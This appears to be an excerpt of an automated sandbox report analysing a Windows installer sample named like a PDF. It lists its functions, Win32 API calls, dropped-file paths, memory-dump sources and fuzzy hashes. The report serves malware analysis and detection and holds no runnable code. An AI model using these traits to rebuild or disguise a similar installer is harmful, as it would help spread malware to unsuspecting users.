                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                • Opcode ID: 0b54b37c65a6f2e9775963e423fcf6596bf7a1857849fbbceef3d2bf8cc140d1
                                                                                                                                                • Instruction ID: acaaf28e16a1f9bce30303e423b06679eb72cb68f5cd5c36ac2be97ede75637d
                                                                                                                                                • Opcode Fuzzy Hash: 0b54b37c65a6f2e9775963e423fcf6596bf7a1857849fbbceef3d2bf8cc140d1
                                                                                                                                                • Instruction Fuzzy Hash: C6C04C717446006AEA209B619D05F077764AB50701F508C397244E51E0CA75E411DA1C
                                                                                                                                                Function 00405606 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(?,?,?,0040543B), ref: 00405614
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                • Opcode ID: a3bd4e69c3a0b4c191a261ee86b7d51c4704c391ae90971fff71fbbf7edd3ec2
                                                                                                                                                • Instruction ID: 7fc37ce8999bee95357acd9183195076b7b6587e69e68807996e1ccba99c995d
                                                                                                                                                • Opcode Fuzzy Hash: a3bd4e69c3a0b4c191a261ee86b7d51c4704c391ae90971fff71fbbf7edd3ec2
                                                                                                                                                • Instruction Fuzzy Hash: 8EB092352D1600AADA215B00DE09F4ABB62ABA4741F008838B240640F0CAB200A5DB08
                                                                                                                                                Function 00403131 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004036CC,?), ref: 0040313F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FilePointer
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                • Opcode ID: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                                                                                                                                • Instruction ID: 249934cc5d2069a5a678a88893d20fb7c04287045258dfdbdab4020963f10c22
                                                                                                                                                • Opcode Fuzzy Hash: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                                                                                                                                • Instruction Fuzzy Hash: 94B09231140200AADA214F009E0AF057B21AB90700F108434B290680F086711060EA0D
                                                                                                                                                Function 70312D14 Relevance: 1.4, APIs: 1, Instructions: 143memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualAlloc.KERNELBASE(?), ref: 70312DD3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37968666099.0000000070310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968717841.0000000070314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968741619.0000000070316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 14f59aa1a1ab3c7e3a6d25afec867a6f2b6528a947e3c317c1869056fed29f10
                                                                                                                                                • Instruction ID: da3045e57e8e8f2f889b819e118ebf2d45bc017299a54a2cd9222a80779d0680
                                                                                                                                                • Opcode Fuzzy Hash: 14f59aa1a1ab3c7e3a6d25afec867a6f2b6528a947e3c317c1869056fed29f10
                                                                                                                                                • Instruction Fuzzy Hash: 8C417D76904E06DFDB089FA9DD82F8D37B9EB0C354F21842AF5058F220D634A9D28BD1

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 00404521 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 576windowmemoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404539
                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404545
                                                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 0040458D
                                                                                                                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004045A6
                                                                                                                                                • SetWindowLongW.USER32(00000000,?,Function_000059D3), ref: 004045BD
                                                                                                                                                • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 004045D3
                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004045E5
                                                                                                                                                • SendMessageW.USER32(00000000,00001109,00000002), ref: 004045F8
                                                                                                                                                • SendMessageW.USER32(00000000,0000111C,00000000,00000000), ref: 00404604
                                                                                                                                                • SendMessageW.USER32(00000000,0000111B,?,00000000), ref: 00404616
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404619
                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404647
                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404651
                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004046FC
                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404726
                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040473C
                                                                                                                                                • GetWindowLongW.USER32(?,?), ref: 0040476B
                                                                                                                                                • SetWindowLongW.USER32(?,?,00000000), ref: 00404778
                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 0040478C
                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 004048C9
                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404944
                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404963
                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,?), ref: 0040498F
                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004049C4
                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004049EB
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004049FB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$ImageWindow$List_Long$GlobalItem$AllocCreateDeleteDestroyFreeLoadMaskedObjectShow
                                                                                                                                                • String ID: M
                                                                                                                                                • API String ID: 1688767230-3664761504
                                                                                                                                                • Opcode ID: bee424e7aad126ffc3dd94acac0c55c887baa37b8f9f8150c8b02386ace4a1e4
                                                                                                                                                • Instruction ID: f817e89bcf48760cfb5f4289bf731060a572f333ebe8f74edde3a20025983385
                                                                                                                                                • Opcode Fuzzy Hash: bee424e7aad126ffc3dd94acac0c55c887baa37b8f9f8150c8b02386ace4a1e4
                                                                                                                                                • Instruction Fuzzy Hash: 7A12C0B16043009FD720DF25DD45A2BB6E9EBC8314F104A3EFA95E72E1DB789C418B59
                                                                                                                                                Function 00404188 Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 281COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 004041D9
                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404203
                                                                                                                                                  • Part of subcall function 00406B4F: GetDlgItemTextW.USER32(?,?,00000400,0040504F), ref: 00406B62
                                                                                                                                                  • Part of subcall function 00406E52: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EC7
                                                                                                                                                  • Part of subcall function 00406E52: CharNextW.USER32(?,?,?,00000000), ref: 00406ED6
                                                                                                                                                  • Part of subcall function 00406E52: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EDB
                                                                                                                                                  • Part of subcall function 00406E52: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EF3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Char$Next$ItemText$PrevWindow
                                                                                                                                                • String ID: :B$ :B$ :B$A$C:\Users\user\AppData\Local\Anvilled$Call
                                                                                                                                                • API String ID: 4089110348-2490974419
                                                                                                                                                • Opcode ID: 64a89f78390c37e28e39dbc90de8c98faa8b9fb800003988ad5373c0b078ce64
                                                                                                                                                • Instruction ID: a7973db417e6baa05db810715503a342ede3a04454d7dbc9c1eaaa2829578ea4
                                                                                                                                                • Opcode Fuzzy Hash: 64a89f78390c37e28e39dbc90de8c98faa8b9fb800003988ad5373c0b078ce64
                                                                                                                                                • Instruction Fuzzy Hash: 8C91B2B1604311ABD710AF65DD81B5B76A8EF84704F41083EFB85B62D1DA7CD9018BAE
                                                                                                                                                Function 70312351 Relevance: 18.7, APIs: 12, Instructions: 705stringlibrarymemoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 703112F8: GlobalAlloc.KERNEL32(?,?,703111C4,-000000A0), ref: 70311302
                                                                                                                                                • GlobalAlloc.KERNEL32(?,00001CA4), ref: 7031294E
                                                                                                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 703129A4
                                                                                                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 703129AF
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 703129C0
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 70312A44
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 70312A4A
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 70312A50
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000008), ref: 70312B1A
                                                                                                                                                • LoadLibraryW.KERNEL32(00000008), ref: 70312B2B
                                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 70312B82
                                                                                                                                                • lstrlenW.KERNEL32(00000808), ref: 70312B9D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37968666099.0000000070310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968717841.0000000070314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968741619.0000000070316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1042148487-0
                                                                                                                                                • Opcode ID: 5bb554575632c6e7a18bf90b177c5a8e65afd372b48f91d547844c50007fb610
                                                                                                                                                • Instruction ID: 9fe025c09ddb13245b9802847389623cdcb51ae6b55474183e32431744e2b8f7
                                                                                                                                                • Opcode Fuzzy Hash: 5bb554575632c6e7a18bf90b177c5a8e65afd372b48f91d547844c50007fb610
                                                                                                                                                • Instruction Fuzzy Hash: 06429171A08B03DFD31DCF25C440A5EB7E9BF8C310F114A2EE59A96294EB70D9E58B91
                                                                                                                                                Function 0040234F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134comCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CoCreateInstance.OLE32(004089F0,?,00000001,004089D0,?,00000000,00000045,000000CD,00000002,000000DF,?), ref: 004023D8
                                                                                                                                                Strings
                                                                                                                                                • C:\Users\user\AppData\Local\Anvilled, xrefs: 0040241F
                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll, xrefs: 004024AC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Anvilled$C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll
                                                                                                                                                • API String ID: 542301482-3642691353
                                                                                                                                                • Opcode ID: b71783c70e184a6a7ddeb92b2c083ba09767801481a9076baeb437bf216bbb0d
                                                                                                                                                • Instruction ID: f69d0b7262b398630d4842e81ecf7832ddb853ca3a8a3f947773e47297c7f3c3
                                                                                                                                                • Opcode Fuzzy Hash: b71783c70e184a6a7ddeb92b2c083ba09767801481a9076baeb437bf216bbb0d
                                                                                                                                                • Instruction Fuzzy Hash: ED414B72204341AFC314DFA5C948A2BBBE9FF89304F10092EF695DB291DBB9D805CB16
                                                                                                                                                Function 00402B75 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402B85
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                                • Opcode ID: aa95f51c6264b43bf771eda4cc7eb5353e28d7212280a1e96ce165172d32d45d
                                                                                                                                                • Instruction ID: 674c96032337a1ae6b1bd2494ca7cf71499a5ca917b528e2f8746cac593059ec
                                                                                                                                                • Opcode Fuzzy Hash: aa95f51c6264b43bf771eda4cc7eb5353e28d7212280a1e96ce165172d32d45d
                                                                                                                                                • Instruction Fuzzy Hash: D9D0E261415250AAD260AF718A49ABA73ADAF05354F204A3EF196E20D1EABC6502932F
                                                                                                                                                Function 00407235 Relevance: .3, Instructions: 310COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                                                                                                                                                • Instruction ID: 0f19b20907bbe26c6374d5e5023c6d38e836cc393430afbe8d7ff324f94daeea
                                                                                                                                                • Opcode Fuzzy Hash: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                                                                                                                                                • Instruction Fuzzy Hash: 36C16A71A0C3918FD364CF29C48076ABBE1FBC5300F54892EE4DA97391E678A546DB4B
                                                                                                                                                Function 00403E8D Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 221windowstringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CheckDlgButton.USER32(?,?,00000001), ref: 00403F2C
                                                                                                                                                • EnableWindow.USER32(?), ref: 00403F39
                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00403F45
                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403F61
                                                                                                                                                • GetSysColor.USER32(?), ref: 00403F72
                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403F80
                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403F8E
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00403F94
                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403FA1
                                                                                                                                                • SendMessageW.USER32(00000000,00000449,?,?), ref: 00403FB8
                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404014
                                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040401B
                                                                                                                                                • EnableWindow.USER32(00000000), ref: 00404038
                                                                                                                                                • GetDlgItem.USER32(0000004E,000003E8), ref: 0040405C
                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004040B1
                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004040C3
                                                                                                                                                • SetCursor.USER32(00000000), ref: 004040CC
                                                                                                                                                  • Part of subcall function 00406B08: ShellExecuteExW.SHELL32(?), ref: 00406B17
                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040410E
                                                                                                                                                • SetCursor.USER32(00000000), ref: 00404111
                                                                                                                                                • SendMessageW.USER32(00000111,?,00000000), ref: 0040413D
                                                                                                                                                • SendMessageW.USER32(?,00000000,00000000), ref: 00404155
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
